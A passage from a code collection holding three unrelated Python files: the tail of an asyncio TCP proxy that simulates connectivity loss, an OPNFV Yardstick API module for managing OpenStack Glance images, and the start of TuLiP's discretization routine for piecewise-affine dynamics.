self.loop.sock_sendall(sock, data))
conn_event_task = asyncio.ensure_future(
self.connectivity_loss.wait())
try:
await asyncio.wait(
[write_task, conn_event_task],
return_when=asyncio.FIRST_COMPLETED)
if self.connectivity_loss.is_set():
return None
else:
return write_task.result()
finally:
if not self.loop.is_closed():
if not write_task.done():
write_task.cancel()
if not conn_event_task.done():
conn_event_task.cancel()
async def proxy_to_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.client_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.backend_sock, data)
except ConnectionError:
pass
finally:
if not self.loop.is_closed():
self.loop.call_soon(self.close)
async def proxy_from_backend(self):
buf = None
try:
while True:
await self.connectivity.wait()
if buf is not None:
data = buf
buf = None
else:
data = await self._read(self.backend_sock, 4096)
if data == b'':
break
if self.connectivity_loss.is_set():
if data:
buf = data
continue
await self._write(self.client_sock, data)
except ConnectionError:
pass
finally:
if not self.loop.is_closed():
self.loop.call_soon(self.close)
|
images.py
|
##############################################################################
# Copyright (c) 2017 Huawei Technologies Co.,Ltd.
#
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
##############################################################################
import logging
import os
import uuid
import threading
import requests
import datetime
from api import ApiResource
from api.database.v2.handlers import V2ImageHandler
from api.database.v2.handlers import V2EnvironmentHandler
from yardstick.common.utils import result_handler
from yardstick.common.utils import source_env
from yardstick.common.utils import change_obj_to_dict
from yardstick.common.openstack_utils import get_nova_client
from yardstick.common.openstack_utils import get_glance_client
from yardstick.common import constants as consts
LOG = logging.getLogger(__name__)
LOG.setLevel(logging.DEBUG)
IMAGE_MAP = {
'yardstick-image': {
'path': os.path.join(consts.IMAGE_DIR, 'yardstick-image.img'),
'url': 'http://artifacts.opnfv.org/yardstick/images/yardstick-image.img'
},
'Ubuntu-16.04': {
'path': os.path.join(consts.IMAGE_DIR, 'xenial-server-cloudimg-amd64-disk1.img'),
'url': 'cloud-images.ubuntu.com/xenial/current/xenial-server-cloudimg-amd64-disk1.img'
},
'cirros-0.3.5': {
'path': os.path.join(consts.IMAGE_DIR, 'cirros-0.3.5-x86_64-disk.img'),
'url': 'http://download.cirros-cloud.net/0.3.5/cirros-0.3.5-x86_64-disk.img'
}
}
class V2Images(ApiResource):
def get(self):
try:
source_env(consts.OPENRC)
except Exception:
return result_handler(consts.API_ERROR, 'source openrc error')
nova_client = get_nova_client()
try:
images_list = nova_client.images.list()
except Exception:
return result_handler(consts.API_ERROR, 'get images error')
else:
images = {i.name: self.get_info(change_obj_to_dict(i)) for i in images_list}
return result_handler(consts.API_SUCCESS, {'status': 1, 'images': images})
def post(self):
return self._dispatch_post()
def get_info(self, data):
try:
size = data['OS-EXT-IMG-SIZE:size']
except KeyError:
size = None
else:
size = float(size) / 1024 / 1024
result = {
'name': data.get('name', ''),
'discription': data.get('description', ''),
'size': size,
'status': data.get('status'),
'time': data.get('updated')
}
return result
def load_image(self, args):
try:
image_name = args['name']
except KeyError:
return result_handler(consts.API_ERROR, 'image name must provided')
if image_name not in IMAGE_MAP:
return result_handler(consts.API_ERROR, 'wrong image name')
thread = threading.Thread(target=self._do_load_image, args=(image_name,))
thread.start()
return result_handler(consts.API_SUCCESS, {'image': image_name})
def upload_image(self, args):
try:
image_file = args['file']
except KeyError:
return result_handler(consts.API_ERROR, 'file must be provided')
try:
environment_id = args['environment_id']
except KeyError:
return result_handler(consts.API_ERROR, 'environment_id must be provided')
try:
uuid.UUID(environment_id)
except ValueError:
return result_handler(consts.API_ERROR, 'invalid environment id')
environment_handler = V2EnvironmentHandler()
try:
environment = environment_handler.get_by_uuid(environment_id)
except ValueError:
return result_handler(consts.API_ERROR, 'no such environment')
file_path = os.path.join(consts.IMAGE_DIR, image_file.filename)
LOG.info('saving file')
image_file.save(file_path)
LOG.info('loading image')
self._load_image(image_file.filename, file_path)
LOG.info('creating image in DB')
image_handler = V2ImageHandler()
image_id = str(uuid.uuid4())
image_init_data = {
'uuid': image_id,
'name': image_file.filename,
'environment_id': environment_id
}
image_handler.insert(image_init_data)
LOG.info('update image in environment')
if environment.image_id:
image_list = environment.image_id.split(',')
image_list.append(image_id)
new_image_id = ','.join(image_list)
else:
new_image_id = image_id
environment_handler.update_attr(environment_id, {'image_id': new_image_id})
return result_handler(consts.API_SUCCESS, {'uuid': image_id})
def upload_image_by_url(self, args):
try:
url = args['url']
except KeyError:
return result_handler(consts.API_ERROR, 'url must be provided')
try:
environment_id = args['environment_id']
except KeyError:
return result_handler(consts.API_ERROR, 'environment_id must be provided')
try:
uuid.UUID(environment_id)
except ValueError:
return result_handler(consts.API_ERROR, 'invalid environment id')
environment_handler = V2EnvironmentHandler()
try:
environment = environment_handler.get_by_uuid(environment_id)
except ValueError:
return result_handler(consts.API_ERROR, 'no such environment')
thread = threading.Thread(target=self._do_upload_image_by_url, args=(url,))
thread.start()
file_name = url.split('/')[-1]
LOG.info('creating image in DB')
image_handler = V2ImageHandler()
image_id = str(uuid.uuid4())
image_init_data = {
'uuid': image_id,
'name': file_name,
'environment_id': environment_id
}
image_handler.insert(image_init_data)
LOG.info('update image in environment')
if environment.image_id:
image_list = environment.image_id.split(',')
image_list.append(image_id)
new_image_id = ','.join(image_list)
else:
new_image_id = image_id
environment_handler.update_attr(environment_id, {'image_id': new_image_id})
return result_handler(consts.API_SUCCESS, {'uuid': image_id})
def delete_image(self, args):
try:
image_name = args['name']
except KeyError:
return result_handler(consts.API_ERROR, 'image name must provided')
if image_name not in IMAGE_MAP:
return result_handler(consts.API_ERROR, 'wrong image name')
glance_client = get_glance_client()
try:
image = next((i for i in glance_client.images.list() if i.name == image_name))
except StopIteration:
return result_handler(consts.API_ERROR, 'can not find image')
glance_client.images.delete(image.id)
return result_handler(consts.API_SUCCESS, {})
def _do_upload_image_by_url(self, url):
file_name = url.split('/')[-1]
path = os.path.join(consts.IMAGE_DIR, file_name)
LOG.info('download image')
self._download_image(url, path)
LOG.info('loading image')
self._load_image(file_name, path)
def _do_load_image(self, image_name):
if not os.path.exists(IMAGE_MAP[image_name]['path']):
self._download_image(IMAGE_MAP[image_name]['url'],
IMAGE_MAP[image_name]['path'])
self._load_image(image_name, IMAGE_MAP[image_name]['path'])
def _load_image(self, image_name, image_path):
LOG.info('source openrc')
source_env(consts.OPENRC)
LOG.info('load image')
glance_client = get_glance_client()
image = glance_client.images.create(name=image_name,
visibility='public',
disk_format='qcow2',
container_format='bare')
with open(image_path, 'rb') as f:
glance_client.images.upload(image.id, f)
LOG.info('Done')
def _download_image(self, url, path):
start = datetime.datetime.now().replace(microsecond=0)
LOG.info('download image from: %s', url)
self._download_file(url, path)
end = datetime.datetime.now().replace(microsecond=0)
LOG.info('download image success, total: %s s', end - start)
def _download_handler(self, start, end, url, filename):
headers = {'Range': 'bytes=%d-%d' % (start, end)}
r = requests.get(url, headers=headers, stream=True)
with open(filename, "r+b") as fp:
fp.seek(start)
fp.tell()
fp.write(r.content)
def _download_file(self, url, path, num_thread=5):
r = requests.head(url)
try:
file_size = int(r.headers['content-length'])
except Exception:
return
with open(path, 'wb') as f:
f.truncate(file_size)
thread_list = []
part = file_size // num_thread
for i in range(num_thread):
start = part * i
end = start + part if i != num_thread - 1 else file_size
kwargs = {'start': start, 'end': end, 'url': url, 'filename': path}
t = threading.Thread(target=self._download_handler, kwargs=kwargs)
t.setDaemon(True)
t.start()
thread_list.append(t)
for t in thread_list:
t.join()
class V2Image(ApiResource):
def get(self, image_id):
try:
uuid.UUID(image_id)
except ValueError:
return result_handler(consts.API_ERROR, 'invalid image id')
image_handler = V2ImageHandler()
try:
image = image_handler.get_by_uuid(image_id)
except ValueError:
return result_handler(consts.API_ERROR, 'no such image id')
nova_client = get_nova_client()
images = nova_client.images.list()
try:
image = next((i for i in images if i.name == image.name))
except StopIteration:
pass
return_image = self.get_info(change_obj_to_dict(image))
return_image['id'] = image_id
return result_handler(consts.API_SUCCESS, {'image': return_image})
def delete(self, image_id):
try:
uuid.UUID(image_id)
except ValueError:
return result_handler(consts.API_ERROR, 'invalid image id')
image_handler = V2ImageHandler()
try:
image = image_handler.get_by_uuid(image_id)
except ValueError:
return result_handler(consts.API_ERROR, 'no such image id')
LOG.info('delete image in openstack')
glance_client = get_glance_client()
try:
image_o = next((i for i in glance_client.images.list() if i.name == image.name))
except StopIteration:
return result_handler(consts.API_ERROR, 'can not find image')
glance_client.images.delete(image_o.id)
LOG.info('delete image in environment')
environment_id = image.environment_id
environment_handler = V2EnvironmentHandler()
environment = environment_handler.get_by_uuid(environment_id)
image_list = environment.image_id.split(',')
image_list.remove(image_id)
environment_handler.update_attr(environment_id, {'image_id': ','.join(image_list)})
LOG.info('delete image in DB')
image_handler.delete_by_uuid(image_id)
return result_handler(consts.API_SUCCESS, {'image': image_id})
def get_info(self, data):
try:
size = data['OS-EXT-IMG-SIZE:size']
except KeyError:
size = None
else:
size = float(size) / 1024 / 1024
result = {
'name': data.get('name', ''),
'description': data.get('description', ''),
'size': size,
'status': data.get('status'),
'time': data.get('updated')
}
return result
|
discretization.py
|
# Copyright (c) 2011-2016 by California Institute of Technology
# Copyright (c) 2016 by The Regents of the University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder(s) nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
"""
Algorithms related to discretization of continuous dynamics.
See Also
========
L{find_controller}
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
logger = logging.getLogger(__name__)
import os
import warnings
import pprint
from copy import deepcopy
import multiprocessing as mp
import numpy as np
from scipy import sparse as sp
import polytope as pc
from polytope.plot import plot_partition, plot_transition_arrow
from tulip import transys as trs
from tulip.hybrid import LtiSysDyn, PwaSysDyn
from .prop2partition import (PropPreservingPartition,
pwa_partition, part2convex)
from .feasible import is_feasible, solve_feasible
from .plot import plot_ts_on_partition
# inline imports:
#
# inline: import matplotlib.pyplot as plt
debug = False
class AbstractSwitched(object):
"""Abstraction of SwitchedSysDyn, with mode-specific and common info.
Attributes:
- ppp: merged partition, if any
Preserves both propositions and dynamics
- ts: common TS, if any
- ppp2ts: map from C{ppp.regions} to C{ts.states}
- modes: dict of {mode: AbstractPwa}
- ppp2modes: map from C{ppp.regions} to C{modes[mode].ppp.regions}
of the form:
{mode: list}
where C{list} has same indices as C{ppp.regions} and
elements in each C{list} are indices of regions in
each C{modes[mode].ppp.regions}.
type: dict
Each partition corresponds to some mode.
(for switched systems)
In each mode a L{PwaSysDyn} is active.
"""
def __init__(
self, ppp=None, ts=None, ppp2ts=None,
modes=None, ppp2modes=None
):
if modes is None:
modes = dict()
self.ppp = ppp
self.ts = ts
self.ppp2ts = ppp2ts
self.modes = modes
self.ppp2modes = ppp2modes
def __str__(self):
s = 'Abstraction of switched system\n'
s += str('common PPP:\n') + str(self.ppp)
s += str('common ts:\n') + str(self.ts)
for mode, ab in self.modes.items():
s += 'mode: ' + str(mode)
s += ', with abstraction:\n' + str(ab)
return s
def ppp2pwa(self, mode, i):
"""Return original C{Region} containing C{Region} C{i} in C{mode}.
@param mode: key of C{modes}
@param i: Region index in common partition C{ppp.regions}.
@return: tuple C{(j, region)} of:
- index C{j} of C{Region} and
- C{Region} object
in C{modes[mode].ppp.regions}
"""
region_idx = self.ppp2modes[mode][i]
ab = self.modes[mode]
return ab.ppp2pwa(region_idx)
def ppp2sys(self, mode, i):
"""Return index of active PWA subsystem in C{mode},
@param mode: key of C{modes}
@param i: Region index in common partition C{ppp.regions}.
@return: tuple C{(j, subsystem)} of:
- index C{j} of PWA C{subsystem}
- L{LtiSysDyn} object C{subsystem}
"""
region_idx = self.ppp2modes[mode][i]
ab = self.modes[mode]
return ab.ppp2sys(region_idx)
def plot(self, show_ts=False, only_adjacent=False):
"""Plot mode partitions and merged partition, if one exists.
For details see L{AbstractPwa.plot}.
"""
axs = []
color_seed = 0
# merged partition exists ?
if self.ppp is not None:
for mode in self.modes:
env_mode, sys_mode = mode
edge_label = {'env_actions':env_mode,
'sys_actions':sys_mode}
ax = _plot_abstraction(
self, show_ts=False, only_adjacent=False,
color_seed=color_seed
)
plot_ts_on_partition(
self.ppp, self.ts, self.ppp2ts,
edge_label, only_adjacent, ax
)
axs += [ax]
# plot mode partitions
for mode, ab in self.modes.items():
ax = ab.plot(show_ts, only_adjacent, color_seed)
ax.set_title('Abstraction for mode: ' + str(mode))
axs += [ax]
#if isinstance(self.ts, dict):
# for ts in self.ts:
# ax = ts.plot()
# axs += [ax]
return axs
class AbstractPwa(object):
"""Discrete abstraction of PWA dynamics, with attributes:
- ppp: Partition into Regions.
Each Region corresponds to
a discrete state of the abstraction
type: L{PropPreservingPartition}
- ts: Finite transition system abstracting the continuous system.
Each state corresponds to a Region in C{ppp.regions}.
It can be fed into discrete synthesis algorithms.
type: L{FTS}
- ppp2ts: bijection between C{ppp.regions} and C{ts.states}.
Has common indices with C{ppp.regions}.
Elements are states in C{ts.states}.
(usually each state is a str)
type: list of states
- pwa: system dynamics
type: L{PwaSysDyn}
- pwa_ppp: partition preserving both:
- propositions and
- domains of PWA subsystems
Used for non-conservative planning.
If just L{LtiSysDyn}, then the only difference
of C{pwa_ppp} from C{orig_ppp} is convexification.
type: L{PropPreservingPartition}
- orig_ppp: partition preserving only propositions
i.e., agnostic of dynamics
type: L{PropPreservingPartition}
- disc_params: parameters used in discretization that
should be passed to the controller refinement
to ensure consistency
type: dict
If any of the above is not given,
then it is initialized to None.
Notes
=====
1. There could be some redundancy in ppp and ofts,
in that they are both decorated with propositions.
This might be useful to keep each of
them as functional units on their own
(possible to change later).
2. The 'Pwa' in L{AbstractPwa} includes L{LtiSysDyn}
as a special case.
"""
def __init__(
self, ppp=None, ts=None, ppp2ts=None,
pwa=None, pwa_ppp=None, ppp2pwa=None, ppp2sys=None,
orig_ppp=None, ppp2orig=None,
disc_params=None
):
if disc_params is None:
disc_params = dict()
self.ppp = ppp
self.ts = ts
self.ppp2ts = ppp2ts
self.pwa = pwa
self.pwa_ppp = pwa_ppp
self._ppp2pwa = ppp2pwa
self._ppp2sys = ppp2sys
self.orig_ppp = orig_ppp
self._ppp2orig = ppp2orig
# original_regions -> pwa_ppp
# ppp2orig -> ppp2pwa_ppp
# ppp2pwa -> ppp2pwa_sys
self.disc_params = disc_params
def __str__(self):
s = str(self.ppp)
s += str(self.ts)
s += 30 * '-' + '\n'
s += 'Map PPP Regions ---> TS states:\n'
s += self._ppp2other_str(self.ppp2ts) + '\n'
s += 'Map PPP Regions ---> PWA PPP Regions:\n'
s += self._ppp2other_str(self._ppp2pwa) + '\n'
s += 'Map PPP Regions ---> PWA Subsystems:\n'
s += self._ppp2other_str(self._ppp2sys) + '\n'
s += 'Map PPP Regions ---> Original PPP Regions:\n'
s += self._ppp2other_str(self._ppp2orig) + '\n'
s += 'Discretization Options:\n\t'
s += pprint.pformat(self.disc_params) +'\n'
return s
def ts2ppp(self, state):
region_index = self.ppp2ts.index(state)
region = self.ppp[region_index]
return (region_index, region)
def ppp2trans(self, region_index):
"""Return the transition set constraint and active subsystem,
for non-conservative planning.
"""
reg_idx, pwa_region = self.ppp2pwa(region_index)
sys_idx, sys = self.ppp2sys(region_index)
return pwa_region, sys
def ppp2pwa(self, region_index):
"""Return dynamics and predicate-preserving region
and its index for PWA subsystem active in given region.
The returned region is the C{trans_set} used for
non-conservative planning.
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, pwa.pwa_ppp[i])}
"""
j = self._ppp2pwa[region_index]
pwa_region = self.pwa_ppp[j]
return (j, pwa_region)
def ppp2sys(self, region_index):
"""Return index and PWA subsystem active in indexed region.
Semantics: j-th sub-system is active in i-th Region,
where C{j = ppp2pwa[i]}
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, pwa.list_subsys[i])}
"""
# LtiSysDyn ?
if self._ppp2sys is None:
return (0, self.pwa)
subsystem_idx = self._ppp2sys[region_index]
subsystem = self.pwa.list_subsys[subsystem_idx]
return (subsystem_idx, subsystem)
def ppp2orig(self, region_index):
"""Return index and region of original partition.
The original partition is w/o any dynamics,
not even the PWA domains, only the polytopic predicates.
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, orig_ppp.regions[i])}
"""
j = self._ppp2orig[region_index]
orig_region = self.orig_ppp[j]
return (j, orig_region)
def _ppp2other_str(self, ppp2other):
if ppp2other is None:
return ''
s = ''
for i, other in enumerate(ppp2other):
s += '\t\t' + str(i) + ' -> ' + str(other) + '\n'
return s
def _debug_str_(self):
s = str(self.ppp)
s += str(self.ts)
s += '(PWA + Prop)-Preserving Partition'
s += str(self.pwa_ppp)
s += 'Original Prop-Preserving Partition'
s += str(self.orig_ppp)
return s
def plot(self, show_ts=False, only_adjacent=False,
color_seed=None):
"""Plot partition and optionally feasible transitions.
@param show_ts: plot feasible transitions on partition
@type show_ts: bool
@param only_adjacent: plot feasible transitions only
between adjacent regions. This reduces clutter,
but if horizon > 1 and not all horizon used,
then some transitions could be hidden.
@param only_adjacent: bool
"""
ax = _plot_abstraction(self, show_ts, only_adjacent,
color_seed)
return ax
def verify_transitions(self):
logger.info('verifying transitions...')
for from_state, to_state in self.ts.transitions():
i, from_region = self.ts2ppp(from_state)
j, to_region = self.ts2ppp(to_state)
trans_set, sys = self.ppp2trans(i)
params = {'N', 'close_loop', 'use_all_horizon'}
disc_params = {k:v for k,v in self.disc_params.items()
if k in params}
s0 = solve_feasible(from_region, to_region, sys,
trans_set=trans_set, **disc_params)
msg = str(i) + ' ---> ' + str(j)
if not from_region <= s0:
logger.error('incorrect transition: ' + msg)
isect = from_region.intersect(s0)
ratio = isect.volume /from_region.volume
logger.error('intersection volume: ' + str(ratio) + ' %')
else:
logger.info('correct transition: ' + msg)
def _plot_abstraction(ab, show_ts, only_adjacent, color_seed):
if ab.ppp is None or ab.ts is None:
warnings.warn('Either ppp or ts is None.')
return
if show_ts:
ts = ab.ts
ppp2ts = ab.ppp2ts
else:
ts = None
ppp2ts = None
ax = ab.ppp.plot(
ts, ppp2ts, only_adjacent=only_adjacent,
color_seed=color_seed
)
#ax = self.ts.plot()
return ax
def discretize(
part, ssys, N=10, min_cell_volume=0.1,
closed_loop=True, conservative=False,
max_num_poly=5, use_all_horizon=False,
trans_length=1, remove_trans=False,
abs_tol=1e-7,
plotit=False, save_img=False, cont_props=None,
plot_every=1, init_part_index_list=[]
):
"""Refine the partition and establish transitions
based on reachability analysis.
Reference
=========
U{[NOTM12]
<https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>}
See Also
========
L{prop2partition.pwa_partition}, L{prop2partition.part2convex}
@param part: L{PropPreservingPartition} object
@param ssys: L{LtiSysDyn} or L{PwaSysDyn} object
@param N: horizon length
@param min_cell_volume: the minimum volume of cells in the resulting
partition.
@param closed_loop: boolean indicating whether the `closed loop`
algorithm should be used. default True.
@param conservative: if true, force sequence in reachability analysis
to stay inside starting cell. If false, safety
is ensured by keeping the sequence inside a convexified
version of the original proposition preserving cell.
@param max_num_poly: maximum number of polytopes in a region to use in
reachability analysis.
@param use_all_horizon: in closed loop algorithm: if we should look
for reachability also in less than N steps.
@param trans_length: the number of polytopes allowed to cross in a
transition. a value of 1 checks transitions
only between neighbors, a value of 2 checks
neighbors of neighbors and so on.
@param remove_trans: if True, remove found transitions between
non-neighbors.
@param abs_tol: maximum volume for an "empty" polytope
@param plotit: plot partitioning as it evolves
@type plotit: boolean,
default = False
@param save_img: save snapshots of partitioning to PDF files,
requires plotit=True
@type save_img: boolean,
default = False
@param cont_props: continuous propositions to plot
@type cont_props: list of C{Polytope}
@rtype: L{AbstractPwa}
"""
start_time = os.times()[0]
orig_ppp = part
min_cell_volume = (min_cell_volume /np.finfo(np.double).eps
*np.finfo(np.double).eps)
ispwa = isinstance(ssys, PwaSysDyn)
islti = isinstance(ssys, LtiSysDyn)
if ispwa:
(part, ppp2pwa, part2orig) = pwa_partition(ssys, part)
else:
part2orig = range(len(part))
# Save original polytopes, require them to be convex
if conservative:
orig_list = None
orig = [0]
else:
(part, new2old) = part2convex(part) # convexify
part2orig = [part2orig[i] for i in new2old]
# map new regions to pwa subsystems
if ispwa:
ppp2pwa = [ppp2pwa[i] for i in new2old]
remove_trans = False # already allowed in nonconservative
orig_list = []
for poly in part:
if len(poly) == 0:
orig_list.append(poly.copy())
elif len(poly) == 1:
orig_list.append(poly[0].copy())
else:
raise Exception("discretize: "
"problem in convexification")
orig = list(range(len(orig_list)))
# Cheby radius of disturbance set
# (defined within the loop for pwa systems)
if islti:
if len(ssys.E) > 0:
rd = ssys.Wset.chebR
else:
rd = 0.
# Initialize matrix for pairs to check
IJ = part.adj.copy()
IJ = IJ.todense()
IJ = np.array(IJ)
logger.debug("\n Starting IJ: \n" + str(IJ) )
# next line omitted in discretize_overlap
IJ = reachable_within(trans_length, IJ,
np.array(part.adj.todense()) )
# Initialize output
num_regions = len(part)
transitions = np.zeros(
[num_regions, num_regions],
dtype = int
)
sol = deepcopy(part.regions)
adj = part.adj.copy()
adj = adj.todense()
adj = np.array(adj)
# next 2 lines omitted in discretize_overlap
if ispwa:
subsys_list = list(ppp2pwa)
else:
subsys_list = None
ss = ssys
# init graphics
if plotit:
try:
import matplotlib.pyplot as plt
plt.ion()
fig, (ax1, ax2) = plt.subplots(1, 2)
ax1.axis('scaled')
ax2.axis('scaled')
file_extension = 'pdf'
except:
logger.error('failed to import matplotlib')
plt = None
else:
plt = None
iter_count = 0
# List of how many "new" regions
# have been created for each region
# and a list of original number of neighbors
#num_new_reg = np.zeros(len(orig_list))
#num_orig_neigh = np.sum(adj, axis=1).flatten() - 1
progress = list()
# Do the abstraction
while np.sum(IJ) > 0:
ind = np.nonzero(IJ)
# i,j swapped in discretize_overlap
i = ind[1][0]
j = ind[0][0]
IJ[j, i] = 0
si = sol[i]
sj = sol[j]
si_tmp = deepcopy(si)
sj_tmp = deepcopy(sj)
#num_new_reg[i] += 1
#print(num_new_reg)
if ispwa:
ss = ssys.list_subsys[subsys_list[i]]
if len(ss.E) > 0:
rd, xd = pc.cheby_ball(ss.Wset)
else:
rd = 0.
if conservative:
# Don't use trans_set
trans_set = None
else:
# Use original cell as trans_set
trans_set = orig_list[orig[i]]
S0 = solve_feasible(
si, sj, ss, N, closed_loop,
use_all_horizon, trans_set, max_num_poly
)
msg = '\n Working with partition cells: ' + str(i) + ', ' + str(j)
logger.info(msg)
msg = '\t' + str(i) +' (#polytopes = ' +str(len(si) ) +'), and:\n'
msg += '\t' + str(j) +' (#polytopes = ' +str(len(sj) ) +')\n'
if ispwa:
msg += '\t with active subsystem: '
msg += str(subsys_list[i]) + '\n'
msg += '\t Computed reachable set S0 with volume: '
msg += str(S0.volume) + '\n'
logger.debug(msg)
#logger.debug('si \cap s0')
isect = si.intersect(S0)
vol1 = isect.volume
risect, xi = pc.cheby_ball(isect)
#logger.debug('si \ s0')
diff = si.diff(S0)
vol2 = diff.volume
rdiff, xd = pc.cheby_ball(diff)
# if pc.is_fulldim(pc.Region([isect]).intersect(diff)):
# logging.getLogger('tulip.polytope').setLevel(logging.DEBUG)
# diff = pc.mldivide(si, S0, save=True)
#
# ax = S0.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/s0.pdf')
#
# ax = si.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/si.pdf')
#
# ax = isect.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/isect.pdf')
#
# ax = diff.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/diff.pdf')
#
# ax = isect.intersect(diff).plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/diff_cap_isect.pdf')
#
# logger.error('Intersection \cap Difference != \emptyset')
#
# assert(False)
if vol1 <= min_cell_volume:
logger.warning('\t too small: si \cap Pre(sj), '
'so discard intersection')
if vol1 <= min_cell_volume and isect:
logger.warning('\t discarded non-empty intersection: '
'consider reducing min_cell_volume')
if vol2 <= min_cell_volume:
logger.warning('\t too small: si \ Pre(sj), so not reached it')
# We don't want our partitions to be smaller than the disturbance set
# Could be a problem since cheby radius is calculated for smallest
# convex polytope, so if we have a region we might throw away a good
# cell.
if (vol1 > min_cell_volume) and (risect > rd) and \
(vol2 > min_cell_volume) and (rdiff > rd):
# Make sure new areas are Regions and add proposition lists
if len(isect) == 0:
isect = pc.Region([isect], si.props)
else:
isect.props = si.props.copy()
if len(diff) == 0:
diff = pc.Region([diff], si.props)
else:
diff.props = si.props.copy()
# replace si by intersection (single state)
isect_list = pc.separate(isect)
sol[i] = isect_list[0]
# cut difference into connected pieces
difflist = pc.separate(diff)
difflist += isect_list[1:]
n_isect = len(isect_list) -1
num_new = len(difflist)
# add each piece, as a new state
for region in difflist:
sol.append(region)
# keep track of PWA subsystems map to new states
if ispwa:
subsys_list.append(subsys_list[i])
n_cells = len(sol)
new_idx = range(n_cells-1, n_cells-num_new-1, -1)
"""Update transition matrix"""
transitions = np.pad(transitions, (0,num_new), 'constant')
transitions[i, :] = np.zeros(n_cells)
for r in new_idx:
#transitions[:, r] = transitions[:, i]
# All sets reachable from start are reachable from both part's
# except possibly the new part
transitions[i, r] = 0
transitions[j, r] = 0
# sol[j] is reachable from intersection of sol[i] and S0
if i != j:
transitions[j, i] = 1
# sol[j] is reachable from each piece os S0 \cap sol[i]
#for k in range(n_cells-n_isect-2, n_cells):
# transitions[j, k] = 1
"""Update adjacency matrix"""
old_adj = np.nonzero(adj[i, :])[0]
# reset new adjacencies
adj[i, :] = np.zeros([n_cells -num_new])
adj[:, i] = np.zeros([n_cells -num_new])
adj[i, i] = 1
adj = np.pad(adj, (0, num_new), 'constant')
for r in new_idx:
adj[i, r] = 1
adj[r, i] = 1
adj[r, r] = 1
if not conservative:
orig = np.hstack([orig, orig[i]])
# adjacencies between pieces of isect and diff
for r in new_idx:
for k in new_idx:
if r is k:
continue
if pc.is_adjacent(sol[r], sol[k]):
adj[r, k] = 1
adj[k, r] = 1
msg = ''
if logger.getEffectiveLevel() <= logging.DEBUG:
msg += '\t\n Adding states ' + str(i) + ' and '
for r in new_idx:
msg += str(r) + ' and '
msg += '\n'
logger.debug(msg)
for k in np.setdiff1d(old_adj, [i,n_cells-1]):
# Every "old" neighbor must be the neighbor
# of at least one of the new
if pc.is_adjacent(sol[i], sol[k]):
adj[i, k] = 1
adj[k, i] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[i, k] = 0
transitions[k, i] = 0
for r in new_idx:
if pc.is_adjacent(sol[r], sol[k]):
adj[r, k] = 1
adj[k, r] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[r, k] = 0
transitions[k, r] = 0
"""Update IJ matrix"""
IJ = np.pad(IJ, (0,num_new), 'constant')
adj_k = reachable_within(trans_length, adj, adj)
sym_adj_change(IJ, adj_k, transitions, i)
for r in new_idx:
sym_adj_change(IJ, adj_k, transitions, r)
if logger.getEffectiveLevel() <= logging.DEBUG:
msg = '\n\n Updated adj: \n' + str(adj)
msg += '\n\n Updated trans: \n' + str(transitions)
msg += '\n\n Updated IJ: \n' + str(IJ)
logger.debug(msg)
logger.info('Divided region: ' + str(i) + '\n')
elif vol2 < abs_tol:
logger.info('Found: ' + str(i) + ' ---> ' + str(j) + '\n')
transitions[j,i] = 1
else:
if logger.level <= logging.DEBUG:
msg = '\t Unreachable: ' + str(i) + ' --X--> ' + str(j) + '\n'
msg += '\t\t diff vol: ' + str(vol2) + '\n'
msg += '\t\t intersect vol: ' + str(vol1) + '\n'
logger.debug(msg)
else:
logger.info('\t unreachable\n')
transitions[j,i] = 0
# check to avoid overlapping Regions
if debug:
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
assert(tmp_part.is_partition() )
n_cells = len(sol)
progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2
progress += [progress_ratio]
msg = '\t total # polytopes: ' + str(n_cells) + '\n'
msg += '\t progress ratio: ' + str(progress_ratio) + '\n'
logger.info(msg)
iter_count += 1
# no plotting ?
if not plotit:
continue
